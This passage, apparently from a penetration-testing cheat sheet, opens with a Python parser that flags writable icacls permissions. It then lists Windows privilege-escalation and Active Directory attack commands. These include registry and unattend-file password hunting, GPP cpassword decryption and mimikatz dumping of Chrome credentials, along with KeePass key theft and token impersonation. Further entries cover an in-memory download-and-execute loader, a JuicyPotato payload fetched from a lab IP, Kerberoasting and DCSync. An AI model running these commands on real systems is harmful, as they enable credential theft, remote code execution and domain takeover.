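The findstr pipelines above have two blind spots: icacls prints the path only on the first ACE line of each entry, so a hit on an indented continuation line (BUILTIN\Users:(OI)(CI)(M) two lines below the path) shows up without the path it belongs to, and write-only ACEs such as (W) or (WD,AD) are never matched at all. Below is an added example (not from the page) that parses icacls output properly and flags every allow ACE granting write-class rights to a low-privilege principal. The sample listing is constructed, not taken from a real host, and the principal patterns cover the well-known accounts plus DOMAIN\name.

```python
import re
from typing import List, NamedTuple


class Ace(NamedTuple):
    path: str
    principal: str
    flags: frozenset   # inheritance markers and DENY, e.g. {"I", "OI", "CI"}
    rights: frozenset  # rights tokens, e.g. {"F"} or {"WD", "AD"}


# Principals that any authenticated user (for Everyone, even anonymous) maps to.
LOW_PRIV_PRINCIPALS = {
    "Everyone",
    r"BUILTIN\Users",
    r"NT AUTHORITY\Authenticated Users",
    r"NT AUTHORITY\INTERACTIVE",
}

# Rights that let the holder replace or add files, or rewrite the ACL itself.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO"}

# Well-known account forms seen in icacls output, plus DOMAIN\name with no spaces after
# the backslash. Order matters: explicit forms come before the generic one, otherwise
# "NT AUTHORITY\SYSTEM" would be split as path "... NT" + principal "AUTHORITY\SYSTEM".
_PRINCIPAL = (
    r"(?:NT AUTHORITY\\Authenticated Users"
    r"|APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES"
    r"|NT AUTHORITY\\[^\s:]+|NT SERVICE\\[^\s:]+|BUILTIN\\[^\s:]+"
    r"|CREATOR OWNER|Everyone|S-1-[\d-]+"
    r"|[^\s\\:]+\\[^\s:]+)"
)
_ACE = r"(?P<principal>" + _PRINCIPAL + r"):(?P<ace>(?:\([^)]*\))+)\s*$"
_FIRST = re.compile(r"^(?P<path>\S.*?) " + _ACE)   # path followed by its first ACE
_CONT = re.compile(r"^\s+" + _ACE)                   # indented continuation ACE


def parse_icacls(text: str) -> List[Ace]:
    """Turn icacls output into one Ace per line, carrying the path across continuation lines."""
    aces: List[Ace] = []
    path = None
    for line in text.splitlines():
        if not line.strip() or line.startswith("Successfully processed"):
            continue
        m = _CONT.match(line) if line[0].isspace() else _FIRST.match(line)
        if not m:
            continue  # unknown principal form: extend _PRINCIPAL rather than guess
        if "path" in m.groupdict():
            path = m.group("path")
        tokens = re.findall(r"\(([^)]*)\)", m.group("ace"))   # last token is the rights
        aces.append(Ace(path, m.group("principal"),
                        frozenset(tokens[:-1]), frozenset(tokens[-1].split(","))))
    return aces


def find_weak_acls(aces: List[Ace]) -> List[Ace]:
    """Allow ACEs that give a low-privilege principal write-class rights."""
    return [a for a in aces
            if a.principal in LOW_PRIV_PRINCIPALS
            and "DENY" not in a.flags
            and a.rights & WRITE_RIGHTS]


# Constructed sample of `icacls "C:\Program Files\*"` output (not from a real host).
SAMPLE_ICACLS = r"""
C:\Program Files\Common Files NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                              BUILTIN\Administrators:(OI)(CI)(F)
                              BUILTIN\Users:(OI)(CI)(RX)
C:\Program Files\Acme Agent NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                            BUILTIN\Users:(I)(OI)(CI)(M)
                            Everyone:(DENY)(W)
C:\Program Files\Legacy Updater Everyone:(OI)(CI)(F)
C:\Program Files\Drop BUILTIN\Users:(OI)(CI)(WD,AD)
                      NT AUTHORITY\Authenticated Users:(RX)

Successfully processed 4 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for ace in find_weak_acls(parse_icacls(SAMPLE_ICACLS)):
        print(f"{ace.path}  {ace.principal}  {','.join(sorted(ace.rights))}")
```

Pipe real output in with `icacls "C:\Program Files\*" > acl.txt` and read the file; the (WD,AD) entry in the sample is the kind the page's findstr "(F)"/"(M)" filters silently miss, and the DENY line shows why a bare grep for "Everyone" over-reports.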
schtasks /query /fo LIST /v
type C:\Users\m0chan\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
net use
wmic logicaldisk get caption,description
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
whoami /priv
Look for SeImpersonate, SeDebugPrivilege etc
qwinsta
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
cmdkey /list
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer
Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}
smbclient //DOMAINCONTROLLER.local/SYSVOL -U m0chan
\m0chanAD.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\Preferences\Groups\Groups.xml  <- look for the cpassword attribute
http://www.sec-1.com/blog/wp-content/uploads/2015/05/gp3finder_v4.0.zip - For Decryption (the AES key for cpassword is published by Microsoft, so any copy decrypts offline; MS14-025 stopped new passwords being written but left existing files in SYSVOL)
Can also use Get-GPPPassword.ps1 from PowerSploit.
#git clone https://github.com/rasta-mouse/CookieMonster
CookieMonster creds
CookieMonster.exe cookies -d [domain] -e
CookieMonster -a
Must be run in the context of the target users as chrome passwords are encrypted with DPAPI.
Can also use Mimikatz for this.
mimikatz dpapi::chrome /in:"C:\Users\m0chan\AppData\Local\Google\Chrome\User Data\Default\Login Data"
mimikatz dpapi::chrome /in:"C:\Users\m0chan\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect
mimikatz dpapi::chrome /in:"C:\Users\m0chan\AppData\Local\Google\Chrome\User Data\Default\Cookies" /unprotect
#https://github.com/HarmJ0y/KeeThief
#http://www.harmj0y.net/blog/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/
Get-Process keepass
tasklist | findstr keepass
Attacking KeePass
#https://raw.githubusercontent.com/HarmJ0y/KeeThief/master/PowerShell/KeeThief.ps1
Import-Module KeeThief.ps1
Get-KeePassDatabaseKey -Verbose
KeeTheft.exe, Microsoft.Diagnostics.Runtime.dll & KeePatched.exe can also be used.
https://github.com/PowerShellMafia/PowerSploit/blob/c7985c9bc31e92bb6243c177d7d1d7e68b6f1816/Exfiltration/Invoke-TokenManipulation.ps1
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe"
Can also use incognito from meterpreter to steal access/delegation tokens and impersonate users. (Requires Admin/SYSTEM Privs)
#Tokenvator https://github.com/0xbadjuju/Tokenvator
Reflectively load it with PowerShell, Cobalt Strike, SilentTrinity etc...
Reflectively load a .NET assembly within PowerShell if you can't do it through your C2 infra. The XOR key and URL are placeholders; the assembly is XOR-decoded in memory and its entry point invoked with the given arguments:
$wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
$k="xxxxxxx";$i=0;[byte[]]$b=([byte[]]($wc.DownloadData("https://xxxxx")))|%{$_-bxor$k[$i++%$k.length]}
$asm=[System.Reflection.Assembly]::Load($b)
$parameters=[string[]]@("arg1", "arg2")
$asm.EntryPoint.Invoke($null, (,$parameters))
#Requires SeImpersonatePrivilege (typically found on service accounts: IIS service, SQL service etc.)
#Reference https://ohpe.it/juicy-potato/
Requirements: SeAssignPrimaryTokenPrivilege and/or SeImpersonatePrivilege
(new-object System.Net.WebClient).DownloadFile('http://10.10.14.5:8000/JuicyPotato.exe','C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\Backup\JuicyPotato.exe')
JuicyPotato.exe -l 1337 -p C:\Users\Public\Documents\Mochan.exe -t * -c {5B3E6773-3A99-4A3D-8096-7765DD11785C}
Mochan.exe = Payload
5B3E6773-3A99-4A3D-8096-7765DD11785C = Target CLSID
A CLSID is a GUID that identifies a COM class object; which CLSIDs work depends on the Windows version, see the CLSID lists on the reference page
Can also use the -a flag to specify arguments alongside cmd.exe/powershell.exe etc
JUICY POTATO HAS TO BE RUN FROM A CMD SHELL AND NOT POWERSHELL
#Check my Blog Post Kerberos Attacks in Depth for Further Information
#https://m0chan.github.io/Kerberos-Attacks-In-Depth
Get-DomainSPNTicket -Credential $cred -OutputFormat hashcat
because Hashcat over John anyday right?
Invoke-Kerberoast.ps1
python GetUserSPNs.py -request -dc-ip 10.10.14.15 m0chanad.local/serviceaccount
Ofc the above requires access to Port 88 on the DC but you can always port forward if executing GetUserSPNs.py manually.
https://github.com/GhostPack/SharpRoast --NOW Deprecated-- and incorporated into Rubeus with the kerberoast action
#https://github.com/skelsec/kerberoast
IMPORTANT: the accepted formats are the following
<ldap_connection_string> : <domainname>/<username>/<secret_type>:<secret>@<DC_ip>
<kerberos_connection_string>: <kerberos realm>/<username>/<secret_type>:<secret>@<DC_ip>
Look for vulnerable users via LDAP
kerberoast ldap all <ldap_connection_string> -o ldapenum
Use ASREP roast against users in the ldapenum_asrep_users.txt file
kerberoast asreproast <DC_ip> -t ldapenum_asrep_users.txt
Use SPN roast against users in the ldapenum_spn_users.txt file
kerberoast spnroast <kerberos_connection_string> -t ldapenum_spn_users.txt
#Accounts have to have DONT_REQ_PREAUTH explicitly set for them to be vulnerable
Get-ASRepHash -Domain m0chanAD.local -User victim
Can also use Rubeus (reflectively load the .NET assembly):
.\Rubeus.exe asreproast
# Running DCSync needs special rights: members of Administrators, Domain Admins or Enterprise Admins, and Domain Controller computer accounts, can run DCSync to pull password data. Note that by default read-only domain controllers are not allowed to pull password data.
# It also works for anyone who has the replication rights on the domain object set to Allow (Replicating Directory Changes and Replicating Directory Changes All).
mimikatz # lsadump::dcsync /domain:corp.local /user:Administrator